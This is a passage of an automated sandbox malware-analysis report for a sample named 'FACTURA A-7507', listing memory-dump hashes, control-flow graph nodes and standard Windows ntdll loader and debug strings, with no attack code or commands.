                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 170109876d0ab0d2cf337bec9ced35007d231b8bbdee9ae038bb35bb97239358
                                                                                                                                                                                                                          • Instruction ID: 493895dbc715fd5e10f7f7910f87717cbf7333a7c23cc29bfb4117a511901132
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 170109876d0ab0d2cf337bec9ced35007d231b8bbdee9ae038bb35bb97239358
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A90023120504882D54472584504A46102547D1305F91C856A0054654DD6368D59B661
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: acb503c3eaa7d68575411de17ceeebc84198e3657124de1a49e818480aae12ca
                                                                                                                                                                                                                          • Instruction ID: 1fce86f2d09a5cf7c7a498ad8cdb8f4c555ae8d823b7a612a6dc460051509440
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acb503c3eaa7d68575411de17ceeebc84198e3657124de1a49e818480aae12ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B190023120100842D5847258450464A101547D2301FD1C85AA0015614DCA268A5D77A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 75c984e51a1be17ec166d9377569d37b03e84acc387b2be2010def861972382c
                                                                                                                                                                                                                          • Instruction ID: 2ec465004a285869f5d2fe4674e58b025700cb2a05df03a41869e8ca37c2451d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75c984e51a1be17ec166d9377569d37b03e84acc387b2be2010def861972382c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB90023120100442D50466985508646101547E1301F91D856A5014515EC67688957131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 58e0feca2597e698c742193b2f2bf40000b5baa21aa67bf4234fd9ea6099f5a5
                                                                                                                                                                                                                          • Instruction ID: bd7889b2ac62230098b9ac3ed6f3bfbbe4ee6cbd64aedb2631d5b0e9969dd922
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58e0feca2597e698c742193b2f2bf40000b5baa21aa67bf4234fd9ea6099f5a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F90022160500442D54472585518706102547D1201F91D856A0014514DC66A8A5976A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b5c596a51512ff1325994cd0a03add57e2204f25845077a1d4c09baf35abfd4b
                                                                                                                                                                                                                          • Instruction ID: 39108f4565dc9440886ea4f9a59070cfc00a5f0f8eb725e864e191d418e7780b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5c596a51512ff1325994cd0a03add57e2204f25845077a1d4c09baf35abfd4b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D90023120100882D50462584504B46101547E1301F91C85BA0114614DC626C8557521
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 23f923bb717fc0c7af4b299e0a062c0854af950cecb7f8c55971914031d30f74
                                                                                                                                                                                                                          • Instruction ID: f2d02375351643f3b1740d0240114cef6667129272ac73df912c661cd699781b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23f923bb717fc0c7af4b299e0a062c0854af950cecb7f8c55971914031d30f74
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04900225221000420549A658070450B145557D73517D1C85AF1406550CC63288696321
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c49f133ae4a5d064876777594def408899d07131adffa1046609e894d7137b22
                                                                                                                                                                                                                          • Instruction ID: 1d48db33d0ad417a49d965c9904932d4c76142eef3365ce62e0cf1a28129ab41
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c49f133ae4a5d064876777594def408899d07131adffa1046609e894d7137b22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9190023160500842D55472584514746101547D1301F91C856A0014614DC7668A5976A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7cf55bf74ebedddfd746a86fe6a0ee020f3ea54772c6598666634c664590f923
                                                                                                                                                                                                                          • Instruction ID: 66608b8df46a4331a032f7cb963801655423700b53b4e751849c5f2f0069accc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cf55bf74ebedddfd746a86fe6a0ee020f3ea54772c6598666634c664590f923
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B90026120200043450972584514616501A47E1201F91C866E1004550DC53688957125
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c18fffc1bc7c21bf8f62d64035c0e785639c98ed132d3f0702560d70b552d516
                                                                                                                                                                                                                          • Instruction ID: 0a5a25f0f276ba0d22989c75ad2af317657c66ffb16957a18577a64d478bc9db
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c18fffc1bc7c21bf8f62d64035c0e785639c98ed132d3f0702560d70b552d516
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8990023120100842D50862584904686101547D1301F91C856A6014615ED67688957131
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                          • Instruction ID: a5e8068f0c35dcd2e67e3141782173290366636cd5d90f4db9fee0df750730d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1012 3550a1f0-3550a269 call 35442330 * 2 RtlDebugPrintTimes 1018 3550a41f-3550a444 call 354424d0 * 2 call 35474b50 1012->1018 1019 3550a26f-3550a27a 1012->1019 1021 3550a2a4 1019->1021 1022 3550a27c-3550a289 1019->1022 1026 3550a2a8-3550a2b4 1021->1026 1024 3550a28b-3550a28d 1022->1024 1025 3550a28f-3550a295 1022->1025 1024->1025 1028 3550a373-3550a375 1025->1028 1029 3550a29b-3550a2a2 1025->1029 1030 3550a2c1-3550a2c3 1026->1030 1031 3550a39f-3550a3a1 1028->1031 1029->1026 1032 3550a2c5-3550a2c7 1030->1032 1033 3550a2b6-3550a2bc 1030->1033 1035 3550a2d5-3550a2fd RtlDebugPrintTimes 1031->1035 1036 3550a3a7-3550a3b4 1031->1036 1032->1031 1038 3550a2cc-3550a2d0 1033->1038 1039 3550a2be 1033->1039 1035->1018 1050 3550a303-3550a320 RtlDebugPrintTimes 1035->1050 1041 3550a3b6-3550a3c3 1036->1041 1042 3550a3da-3550a3e6 1036->1042 1040 3550a3ec-3550a3ee 1038->1040 1039->1030 1040->1031 1045 3550a3c5-3550a3c9 1041->1045 1046 3550a3cb-3550a3d1 1041->1046 1047 3550a3fb-3550a3fd 1042->1047 1045->1046 1051 3550a3d7 1046->1051 1052 3550a4eb-3550a4ed 1046->1052 1048 3550a3f0-3550a3f6 1047->1048 1049 3550a3ff-3550a401 1047->1049 1054 3550a447-3550a44b 1048->1054 1055 3550a3f8 1048->1055 1053 3550a403-3550a409 1049->1053 1050->1018 1060 3550a326-3550a34c RtlDebugPrintTimes 1050->1060 1051->1042 1052->1053 1056 3550a450-3550a474 RtlDebugPrintTimes 1053->1056 1057 3550a40b-3550a41d RtlDebugPrintTimes 1053->1057 1059 3550a51f-3550a521 1054->1059 1055->1047 1056->1018 1063 3550a476-3550a493 RtlDebugPrintTimes 1056->1063 1057->1018 1060->1018 1065 3550a352-3550a354 1060->1065 1063->1018 1070 3550a495-3550a4c4 RtlDebugPrintTimes 1063->1070 1067 3550a356-3550a363 1065->1067 1068 3550a377-3550a38a 1065->1068 1071 3550a365-3550a369 1067->1071 1072 3550a36b-3550a371 1067->1072 1069 3550a397-3550a399 1068->1069 1073 3550a39b-3550a39d 1069->1073 1074 3550a38c-3550a392 1069->1074 1070->1018 1078 3550a4ca-3550a4cc 1070->1078 1071->1072 1072->1028 1072->1068 1073->1031 1075 3550a394 1074->1075 1076 3550a3e8-3550a3ea 1074->1076 1075->1069 1076->1040 1079 3550a4f2-3550a505 1078->1079 1080 3550a4ce-3550a4db 1078->1080 1083 3550a512-3550a514 1079->1083 1081 3550a4e3-3550a4e9 1080->1081 1082 3550a4dd-3550a4e1 1080->1082 1081->1052 1081->1079 1082->1081 1084 3550a516 1083->1084 1085 3550a507-3550a50d 1083->1085 1084->1049 1086 3550a51b-3550a51d 1085->1086 1087 3550a50f 1085->1087 1086->1059 1087->1083
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: HEAP:
                                                                                                                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                          • Opcode ID: dbe907a61729da3a5b02ca18fa58090d174087ba8af3a1f3b79884845a20e631
                                                                                                                                                                                                                          • Instruction ID: b51e1f65e05d025cbcd69cf6e4fb32ffb301f9cb25993b7ba1b38502714432fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbe907a61729da3a5b02ca18fa58090d174087ba8af3a1f3b79884845a20e631
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EA189756183128FD705CE28C894A5AB7E6FB88750F08492EED46DB311EB70EC49CF91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1088 35467550-35467571 1089 35467573-3546758f call 3543e580 1088->1089 1090 354675ab-354675b9 call 35474b50 1088->1090 1095 35467595-354675a2 1089->1095 1096 354a4443 1089->1096 1097 354675a4 1095->1097 1098 354675ba-354675c9 call 35467738 1095->1098 1099 354a444a-354a4450 1096->1099 1097->1090 1106 35467621-3546762a 1098->1106 1107 354675cb-354675e1 call 354676ed 1098->1107 1101 354675e7-354675f0 call 35467648 1099->1101 1102 354a4456-354a44c3 call 354bef10 call 35478f40 RtlDebugPrintTimes BaseQueryModuleData 1099->1102 1101->1106 1113 354675f2 1101->1113 1102->1101 1120 354a44c9-354a44d1 1102->1120 1111 354675f8-35467601 1106->1111 1107->1099 1107->1101 1115 35467603-35467612 call 3546763b 1111->1115 1116 3546762c-3546762e 1111->1116 1113->1111 1119 35467614-35467616 1115->1119 1116->1119 1122 35467630-35467639 1119->1122 1123 35467618-3546761a 1119->1123 1120->1101 1124 354a44d7-354a44de 1120->1124 1122->1123 1123->1097 1125 3546761c 1123->1125 1124->1101 1126 354a44e4-354a44ef 1124->1126 1127 354a45c9-354a45db call 35472b70 1125->1127 1129 354a45c4 call 35474c68 1126->1129 1130 354a44f5-354a452e call 354bef10 call 3547a9c0 1126->1130 1127->1097 1129->1127 1137 354a4530-354a4541 call 354bef10 1130->1137 1138 354a4546-354a4576 call 354bef10 1130->1138 1137->1106 1138->1101 1143 354a457c-354a458a call 3547a690 1138->1143 1146 354a458c-354a458e 1143->1146 1147 354a4591-354a45ae call 354bef10 call 354acc1e 1143->1147 1146->1147 1147->1101 1152 354a45b4-354a45bd 1147->1152 1152->1143 1153 354a45bf 1152->1153 1153->1101
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 354A4592
                                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 354A4530
                                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 354A4507
                                                                                                                                                                                                                          • ExecuteOptions, xrefs: 354A44AB
                                                                                                                                                                                                                          • Execute=1, xrefs: 354A451E
                                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 354A454D
                                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 354A4460
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                                                                                                          • Opcode ID: 68ae1d2c2fd134e8b8585deae20ee2882ba90470bf27c4cbcc9f7a44f202b5c7
                                                                                                                                                                                                                          • Instruction ID: ca0bf8abbcf0f177cbf0fd82a65eb50f9c824ef1f89683119e4f32c72e6a7939
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68ae1d2c2fd134e8b8585deae20ee2882ba90470bf27c4cbcc9f7a44f202b5c7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86510771A00319BAEB18DBA4ED85FED73B8BF04358F4004E9E505A7281EB709A458FA0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35497807
                                                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 354977DD, 35497802
                                                                                                                                                                                                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 354978F3
                                                                                                                                                                                                                          • SsHd, xrefs: 3544A304
                                                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 354977E2
                                                                                                                                                                                                                          • Actx , xrefs: 35497819, 35497880
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                          • API String ID: 0-1988757188
                                                                                                                                                                                                                          • Opcode ID: 73b66152c0cdeaea7f4bcfea7ca29e94a27a81442ba0c9d6d9c0daf68785716d
                                                                                                                                                                                                                          • Instruction ID: 5efb0ff2f2bf3a12171580532dc064902662e0448e51629b3e90a27a1f187a79
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73b66152c0cdeaea7f4bcfea7ca29e94a27a81442ba0c9d6d9c0daf68785716d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E105B46483018FF70DCE26C982B9ABBE2BB85354F504A6DEC56CB790D771E845CB81
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35499178
                                                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 3549914E, 35499173
                                                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35499153
                                                                                                                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35499372
                                                                                                                                                                                                                          • Actx , xrefs: 35499315
                                                                                                                                                                                                                          • GsHd, xrefs: 3544D794
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                          • Opcode ID: 2cfcfbf78f411f019d036a80cfe8b717bc9a588ed5b2f2a2930235d3e6ba5a3b
                                                                                                                                                                                                                          • Instruction ID: b65ba546cb0394847240cb56baf341976180d0837a15df310a04f8e99167f519
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfcfbf78f411f019d036a80cfe8b717bc9a588ed5b2f2a2930235d3e6ba5a3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52E18FB46083419FE71CCF14C881B5ABBF5BF88354F424AADE8A58B381D771E945CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 3542651C
                                                                                                                                                                                                                            • Part of subcall function 35426565: RtlDebugPrintTimes.NTDLL ref: 35426614
                                                                                                                                                                                                                            • Part of subcall function 35426565: RtlDebugPrintTimes.NTDLL ref: 3542665F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3548977C
                                                                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 35489783, 35489796, 354897BF
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354897A0, 354897C9
                                                                                                                                                                                                                          • apphelp.dll, xrefs: 35426446
                                                                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35489790
                                                                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 354897B9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                                                                                                                          • Opcode ID: 5d49ac002c1a74e16e51b4699f92afa964f6d76faf0824069fc7e30ea7ad9096
                                                                                                                                                                                                                          • Instruction ID: 892d9793af4e30aae4b9104249adde3ccb35c7dbbd93554d7e7bf306909b1eeb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d49ac002c1a74e16e51b4699f92afa964f6d76faf0824069fc7e30ea7ad9096
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0519C71608B049FE318CF24D890E9BB7F8FB84644F41095EF995A7260EF31EA45CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                                                                                                                          • Opcode ID: 9674e9093770f069c7250674e5a89fd9ee518b1a0c963b617b6eabe40d8011d1
